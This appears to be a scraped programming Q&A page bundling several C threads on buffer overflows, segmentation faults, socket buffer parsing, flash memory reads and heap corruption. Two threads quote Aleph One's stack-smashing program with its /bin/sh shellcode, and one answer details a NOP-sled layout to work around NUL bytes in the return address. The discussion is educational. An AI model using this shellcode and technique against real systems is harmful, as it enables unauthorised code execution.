Avoid NUL Terminating Character for Stack Smashing with strcpy()

Avoid NUL Terminating Character for Stack Smashing with strcpy() - c

I have recently been following aleph1's Smashing The Stack For Fun And Profit paper, and I've reached a part where I am unable to smash the stack with strcpy.
In the chapter titled: "Writing an Exploit(or how to mung the stack)", aleph1 writes the following code (which I tried to run my computer):
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.
This code works exactly as it's supposed to for me until it gets to this line:
strcpy(buffer,large_string);
After lots of digging around, I found out that strcpy doesn't overflow buffer as it should, because the address of buffer (which is copied many times into large_string) has NUL string-terminating zeros in it.
Therefore, strcpy() stops after the first NUL it runs into, which is well before we overwrite the return address of main with buffer's address.
Is there a way to solve this problem and somehow make the address of buffer not have any zeroes in it?

I guess you are using the Windows operating system and little endian processor, that's because as far as i know linux puts the address code from above so linux usually doesn't have a NULL byte in address. Different from windows which start from a low address so that it contains NULL byte. There is a trick which is to add enough NOP instruction in your shellcode until it overwrite the return address. Because your address contain NULL byte, you only write the return address once (strcpy stop at NULL byte). In order to do this you should look at the assembly and calculate the exact size of the shellcode needed and then put the target return address afterward.
Here are the pseudo
// &ret_addr is address of where your target_return_addres to be stored.
// To get it:
// view in debugger
// break at first instruction in main. Usually push ebp instruction
// look ESP register value
a = &ret_addr - &buffer // [NOP] + [SHELLCODE]
// fill large_string with return address
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
// fill large_string with NOP
n = a - strlen(shellcode)
for (i = 0; i < n; i++)
large_string[i] = NOP;
// fill large_string with your shellcode
for (i = 0; i < strlen(shellcode); i++)
large_string[n+i] = shellcode[i];
At the end large_string will look like this
[n bytes] [strlen(shellcode) bytes] [Rest Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
and buffer will look like this
[n bytes] [strlen(shellcode) bytes] [4 Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
Remember this will work if NX bit and stack canaries are turned off. Try it in debugger to understand it very well

Related

Segmentation fault on copying string elements to another string

Why am I getting segmentation fault? I have listed my code below.
Please tell if anyone knows what is my fault here and how do I correct it?
What I am trying to do here
I am trying to take numbers as input and for them I have to output a string of characters.
Problem
link to the problem is here.
The code of my proposed solution
#include <stdio.h>
#include <string.h>
#include <math.h>
int main() {
long long int n, k;
char manku[] = { 'm', 'a', 'n', 'k', 'u' };
char l[10000000];
int t, i = 0, j, p;
scanf("%d", &t);
while (t > 0)
{
scanf("%lld", &n);
while (n > 0)
{
j = n % 5;
if (j == 0)
l[i] = manku[4];
else
l[i] = manku[j - 1];
n = n / 5;
i++;
}
p = strlen(l);
for (i = 0; i < p; i++)
l[i] = l[p - 1 - i];
for (i = 0; i < p; i++)
printf("%c", l[i]);
t--;
}
return 0;
}

char l[10000000];
This huge array is overflowing your stack memory.
The stack memory segment is an area of memory allotted for automatic variables and its size is fairly small. It is not a good idea to have such a huge array in stack.
Try to allocate it dynamically, like this:
char *l;
l = malloc(10000000); //note: size of char is 1
With this, the memory allocated to l in heap segment. Make sure to free it once you done with it.
Alternatively, you can make l a global variable or a static local variable so that it will go in Data Segment.

You are getting a segmentation fault when you start running your binary because you are running out of stack memory due to the big size of your array char l[10000000] (you can check the size of your stack by running
$ ulimit -s
in your shell).
There are at least two solutions to this:
Increase the size of your stack. You can do this by running, e.g.,
$ ulimit -s unlimited
in your shell before running the binary.
Use malloc to allocate the l array, so that it is allocated in the heap rather than in the stack.

Firstly, initialize the variable i after scanning n.
while(t>0) {
scanf("%lld",&n);
i = 0; /* initialize i every time here */
while(n>0) {
/* some code */
}
}
Also instead of creating stack created array like char l[10000000]; create the dynamic array once before while loop and free the dynamically allocated memory once done. for e.g
char *l = malloc(SIZE); /* define the SIZE */
...
...
free(l);

Short Answer: The segmentation fault is caused by char l[10000000];. Decalring char l[26]; is sufficient.
Details
As others said the allocation char l[10000000]; causes the segmentation fault. You do not need this much memory. The question stated that the maximum value for n is 10^18. Thus the maximum length of a word would be 26 characters. Thus, char l[26]; is sufficient.
Explanation: It is given that you have 10^18 options to arrange k characters. Each charater has 5 options and thus the number of options to arrange these characters is 5^k. Now, you just have to find k:
5^k = 10^18 ==> k = log_5(10^18) ~= 25.75218 < 26
Implementation
Regarding the implementation, you have few wrong things going on.
You do not set i = 0; after each input scan.
Your can not use strlen without the terminating null-character. You should add l[i] = '\0'; above p = strlen(l);.
Your second for loop, the one that should revert the string, is not working properly. Each step changes the string and the steps after it use the changed string (instead of working with the original one).
Regarding the algorithm, it does not work properly as well. I can give you a hint: this problem is similar to counting in base-5.
Comments
The things above are just few things that I have noticed. I think you should consider rewriting the code since it may still contaion small flaws.
Another tip: for printing strings (character arrays in c) you can use
printf("%s", str);
Assuming that str is an array of character that ends with the terminating null-character. Some more information here.

Parse single message coming over socket containing 2 strings in C

I'm trying to read a message that contains 2 strings. This message contains 2 strings that could be anything, and it is sent over a socket.
Note that I'm using C in Ubuntu environment.
The format of the message is, in a single void* buffer:
[string1]\0[string2]\0
I figured I'd be able to separate them once they arrive, using the '\0' to figure out where to split them. I'm using a function to read just the string and it sort of works, but I keep getting complaints from Valgrind, and I don't understand why.
I'm going to use an example where only 1 string is read from the buffer, but I mention the strategy because I'm not able to just put the message into a char* buffer. I need the function to extract a string from more complex buffers.
It all starts like this:
void* buffer = malloc(msgSize * sizeof(char)); //the message size is properly calculated to include the '\0' at the end
char* instanceId = malloc(msgSize * sizeof(char));
if(recv(socket_desc, (void*) buffer, msgSize * sizeof(char), MSG_WAITALL) <= 0) {
log_error(logger, "Message failed.");
return;
}
bufferToString(buffer, &instanceId, 0);
bufferToString2(buffer, instanceId, 0);
I made several attempts to make bufferToString work, as you can see... Of course I don't invoke them all at the same time, but I want to share those lines in case I'm making a mistake there.
Attempt #Number 1: char by char
int bufferToString(void* buffer, char** string, int startPtr) {
//startPtr can be used to read strings that are in the middle of a buffer
char a;
int thisStringPtr = 0;
do {
a = *(char*) (buffer + startPtr);
(*string)[thisStringPtr] = a;
startPtr++;
thisStringPtr++;
} while (a != '\0');
return startPtr; //return end position to use for extracting more values later
}
This one complains:
==23047== Invalid read of size 1
==23047== at 0x403A27A: bufferToString (buffer.c:16)
==23047== by 0x804A0C2: handleHiloInstancia (coordinador.c:232)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
==23047== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
==23047== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23047== by 0x804A063: handleHiloInstancia (coordinador.c:225)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
Line 16 of bufferToString is the first line inside the do statement.
Attempt 2: cast and copy
int bufferToString2(void* buffer, char* string, int startPtr) {
strcpy(string, (char*) (buffer + startPtr));
return (strlen(string) + 1)*sizeof(char);
}
With or without the +startPtr, this causes slightly different problems:
==23190== Invalid read of size 1
==23190== at 0x402F489: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23190== by 0x403A1E3: bufferToString2 (buffer.c:3)
==23190== by 0x804A0C1: handleHiloInstancia (coordinador.c:232)
==23190== by 0x8049C54: procesarConexion (coordinador.c:85)
==23190== by 0x4066294: start_thread (pthread_create.c:333)
==23190== by 0x41650AD: clone (clone.S:114)
==23190== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
I tried a few other combinations (like using char** string and all the required modifications in bufferToString2), but I keep getting similar error messages. What am I not seeing?
UPDATE: How message is being sent:
int bufferSize;
void* buffer = serializePackage(HANDSHAKE_INSTANCE_ID ,instancia_config->nombre, &bufferSize );
printf("Buffer size: %i - Instancia Name = %s - Socket num: %i\n", bufferSize, instancia_config->nombre, socket_coordinador); //this shows right data
if (send(socket_coordinador,buffer,bufferSize, 0) <= 0) {
log_error(logger, "Could not send ID.");
endProcess(EXIT_FAILURE);
}
instancia_config->nombre is of type char*
void* serializePackage(int codigo,char * mensaje, int* tamanioPaquete){
int puntero = 0;
int length = strlen(mensaje);
int sizeOfPaquete = strlen(mensaje) * sizeof(char) + 1 + 2 * sizeof(int);
void * paquete = malloc(sizeOfPaquete);
memcpy((paquete + puntero) ,&codigo,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),&length,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),mensaje,length * sizeof(char) + 1);
*tamanioPaquete = sizeOfPaquete;
return paquete;
}

Do you have your src and dst the right way around?
The destination (or target if you prefer) of memory services in C is the first parameter, so:
strcpy(string, buffer)
will copy buffer into string. (https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm)
But: bufferToString2 is being called with buffer as the first parameter (and it's the source in this case).
In the first case, as was pointed out, you can't do arithmetic on a void* because the math is trying to go to the Nth element if you say:
*(x + N)
and if x is 'void' it has no size, and therefore the Nth element isn't meaningful.

Since there is not an answer yet that eventually solved the problem ostensibly, and no further progress on this question, I will summarize what I partially mentioned in my comments to at least provide hints where to start looking for the problem:
A lot of information is, unfortunately, missing to seriously treat this question.
For example, which kind of socket do you use to send / receive your messages?
Is it a pipe, or a network socket - which kind of transport do you use then?
How do you ensure that you received the entire message?
You should at least check the return value of recv (which happens to be the number of received octets) and check with the expected length if there is one.
When having received your message,have the message dumped as is - if you are not familiar with using a debugger, a function like this would do as a starter:
void dump(const char* buffer, size_t length) {
for(size_t i = 0; i < length; ++i) {
printf("%x", buffer[i] & 0xff);
}
printf("\n");
}
and invoke it in your code after the ssize_t received = recv(...) like dump(buffer, received).
Furthermore, you don't provide the way you calculate msgSize in your first code snippet - how do you guarantee that the string in mensaje you pass over to serializePacket is not longer than msgSize ?
Then, in serializePacket, you create a buffer filled like this:
| codigo (int) | length (int) | mensaje ( = terminal zero) |
but what you read back at the other end is just a c string - you ought to read the 2 ints as well, ought you not?
Then, there is another problem with this bit of serialization: Even if you read back the 2 ints, you would have a piece of code that is entirely unportable and works only if both sender and receiver run on an architecture that represent ints precisely the same way and in the same bit order. if you run the sender on a 32 bit system and the receiver on a 64 bit system, you write 4 byte integers, while attempt to read back 8 byte integers. Better use
types with precisely defined width (like uint32_t from inttypes.h ) and explicitly convert to/from network byte order using e.g. ntohl(3) / htonl(3).
Lastly, I want to add some remarks to improve the quality of code, that might prevent a lot of potential errors:
Take as example your bufferToString:
You passed in string as char** - why?
Use appropriate data types - don't use a signed int where you deal with non-negative sizes - use the standard type size_t instead
Don't use void* as type unless really necessary - you loose a hell lot of compile time error checking. C automatically converts from void* in assignments. So declaring buffer as char* is highly suggested.
This function, e.g. can harshly be simplified:
size_t bufferToString(const char* buffer, char* string, size_t offset) {
for(size_t i = offset; 0 != buffer[i]; ++i) {
string[i] = buffer[i];
}
return ++i;
}
I can only emphazise that network code tends to be hard to debug - there are all kinds of external error sources you cannot really oversee.
Hopefully these hints help to track down the root cause of your problem.

C: Read values of entire flash memory of MCU

I want to read the values of the memory locations of the entire program flash memory of an MCU, in particular, the CC2538 on the OpenMote-CC2538. The read values are then computed into, currently, a large sum of all the values.
At this moment, I have the following code working to traverse the memory and get the values
uint64_t readMemory() {
unsigned char * bytes = (char *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i++) {
amount += bytes[i];
}
return amount;
}
uint64_t readFlashMemory() {
unsigned int * bytes = (int *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i+=4) {
amount += FlashGet(bytes);
bytes++;
}
return amount;
}
address 0x200000 and its size is 0x0007FFD4. The first function works with a char and goes to each address one by one, while the second one uses an existing function FlashGet(uint32_t) from the flash.c file, which is a direct access to a register (HWREG).
FlashGet requires a uint32_t address and returns a uint32_t value, as such it has a length of 4 and the address should be moved with 4 in the loop .The first function uses char for the addressing, which is a length of 1 and so the address should also move by 1 in the loop. Am I correct in these statements? If so, am I executing them correctly? For the second function, incrementing the pointer with 1 should move it with 4 due to it being of type uint32_t (similar to int).
However, the functions return a different value.
The first one returns: 674426297757
The second one returns: 8213668631160
As both functions should be doing the same, one or both must be incorrect and is not reading the entire program flash memory.
How can I fix both functions? Is there a better or easier way to read the entire memory when you have the starting address and size?

Consider you have a 4-byte flash memory with content
00 01 02 03
Adding by byte values will give you 0x000000000000006
Adding by 32-bit int values will give you 0x0000000003020100 assuming little-endian.

Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand all the theory behind the exploit:
the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.
We would like to copy its content to main's buffer, in addition to overwrite main's return address to the beginning of the buffer (so that the execution control will be of our "spawning a shell" code. We do it by coping the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_sting[] will contain the buffer's address (first for-loop).
Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is srlen(shellcode)?
I would some clearing on that kind of stuff.
Thanks!

1) Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It copies four bytes at a time (it relies on knowing that sizeof(int) is 4 on the target platform), and 32 * 4 == 128.
2) What is srlen(shellcode)?
It's the number of bytes in shellcode (this relies on the fact that shellcode does not contain embedded \0 characters).

Trying to free memory after calling strcpy causes the program to crash

I understand that a lot of people here complain about strcpy, but I haven't found anything using search that addresses the issue I have.
First off, calling strcpy itself doesn't cause any sort of crash/segmentation fault itself. Secondly, the code is contained within a function, and the first time that I call this function it works perfectly. It only crashes on the second time through.
I'm programming with the LPC1788 microcontroller; memory is pretty limited, so I can see why things like malloc may fail, but not free.
The function trimMessage() contains the code, and the purpose of the function is to remove a portion of a large string array if it becomes too large.
void trimMessage()
{
int trimIndex;
// currMessage is a globally declared char array that has already been malloc'd
// and written to.
size_t msgSize = strlen(currMessage);
// Iterate through the array and find the first newline character. Everything
// from the start of the array to this character represents the oldest 'message'
// in the array, to be got rid of.
for(int i=0; i < msgSize; i++)
{
if(currMessage[i] == '\n')
{
trimIndex = i;
break;
}
}
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = (char*)malloc((msgSize - trimIndex - 1) * sizeof(char));
trimMessage[0] = '\f';
// trimTimes = the number of times this function has been called and fully executed.
// freeing memory just below is non-sensical, but it works without crashing.
//if(trimTimes == 1) { printf("This was called!\n"); free(trimMessage); }
strcpy(&trimMessage[1], &currMessage[trimIndex+1]);
// The following line will cause the program to crash.
if(trimTimes == 1) free(trimMessage);
printf("trimMessage: >%s<\n", trimMessage);
// Frees up the memory allocated to currMessage from last iteration
// before assigning new memory.
free(currMessage);
currMessage = malloc((msgSize - trimIndex + 1) * sizeof(char));
for(int i=0; i < msgSize - trimIndex; i++)
{
currMessage[i] = trimMessage[i];
}
currMessage[msgSize - trimIndex] = '\0';
free(trimMessage);
trimMessage = NULL;
messageCount--;
trimTimes++;
}
Thank you to everyone that helped. The function works properly now. To those asking why I was trying to print out an array I just freed, that was just there to show that the problem occurred after strcpy and rule out any other code that came after it.
The final code is here, in case it proves useful to anyone who comes across a similar problem:
void trimMessage()
{
int trimIndex;
size_t msgSize = strlen(currMessage);
char *newline = strchr(currMessage, '\n');
if (!newline) return;
trimIndex = newline - currMessage;
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = malloc(msgSize - trimIndex + 1);
trimMessage[0] = '\f';
strcpy(&trimMessage[1], &currMessage[trimIndex+1]);
trimMessage[msgSize - trimIndex] = '\0';
// Frees up the memory allocated to currMessage from last iteration
// before assigning new memory.
free(currMessage);
currMessage = malloc(msgSize - trimIndex + 1);
for(int i=0; i < msgSize - trimIndex; i++)
{
currMessage[i] = trimMessage[i];
}
currMessage[msgSize - trimIndex] = '\0';
free(trimMessage);
messageCount--;
}

free can and will crash if the heap is corrupt or if you pass it an invalid pointer.
Looking at that, I think your first malloc is a couple of bytes short. You need to reserve a byte for the null terminator and also you're copying into offset 1, so you need to reserve another byte for that. So what is going to happen is that your copy will overwrite information at the start of the next block of heap (often used for length of next block of heap and an indication as to whether or not it is used, but this depends on your RTL).
When you next do a free, it may well try to coalesce any free blocks. Unfortunately, you've corrupted the next blocks header, at which point it will go a bit insane.

Compare these two lines of your code (I've respaced the second line, of course):
char *trimMessage = (char*)malloc((msgSize - trimIndex - 1) * sizeof(char));
currMessage = malloc((msgSize - trimIndex + 1) * sizeof(char));
Quite apart from the unnecessary difference in casting (consistency is important; which of the two styles you use doesn't matter too much, but don't use both in the same code), you have a difference of 2 bytes in the length. The second is more likely to be correct than the first.
You allocated 2 bytes too few in the first case, and the copy overwrote some control information that malloc() et al depend on, so the free() crashed because you had corrupted the memory it manages.
In this case, the problem was not so much strcpy() as miscalculation.
One of the problems with corrupting memory is that the victim code (the code that finds the trouble) is often quite far removed from the code that caused the trouble.
This loop:
for(int i=0; i < msgSize; i++)
{
if(currMessage[i] == '\n')
{
trimIndex = i;
break;
}
}
could be replaced with:
char *newline = strchr(currMessage, '\n');
if (newline == 0)
...deal with no newline in the current messages...
trimIndex = newline - currMessage;

Add this code just before the malloc() call:
// we need the destination buffer to be large enough for the '\f' character, plus
// the remaining string, plus the null terminator
printf("Allocating: %d Need: %d\n", (msgSize - trimIndex - 1), 1 + strlen(&currMessage[trimIndex+1]) + 1);
And I think it will show you the problem.
It's been demonstrated time and again that hand calculating buffer sizes can be error prone. Sometimes you have to do it, but other times you can let a function handle those error prone aspects:
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = strdup( &currMessage[trimIndex]);
if (trimMessage && (trimMessage[0] == '\n')) {
trimMessage[0] = '\f';
}
If your runtime doesn't have strdup(), it's easy enough to implement (http://snipplr.com/view/16919/strdup/).
And as a final edit, here's an alternative, simplified trimMessage() that I believe to be equivalent:
void trimMessage()
{
char *newline = strchr(currMessage, '\n');
if (!newline) return;
memmove( currMessage, newline, strlen(newline) + 1);
currMessage[0] = '\f'; // replace '\n'
messageCount--;
}

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight

Avoid NUL Terminating Character for Stack Smashing with strcpy() - c

Related

Segmentation fault on copying string elements to another string

Parse single message coming over socket containing 2 strings in C

C: Read values of entire flash memory of MCU

Understanding Aleph One's first buffer overflow exploit

Trying to free memory after calling strcpy causes the program to crash

Categories

Resources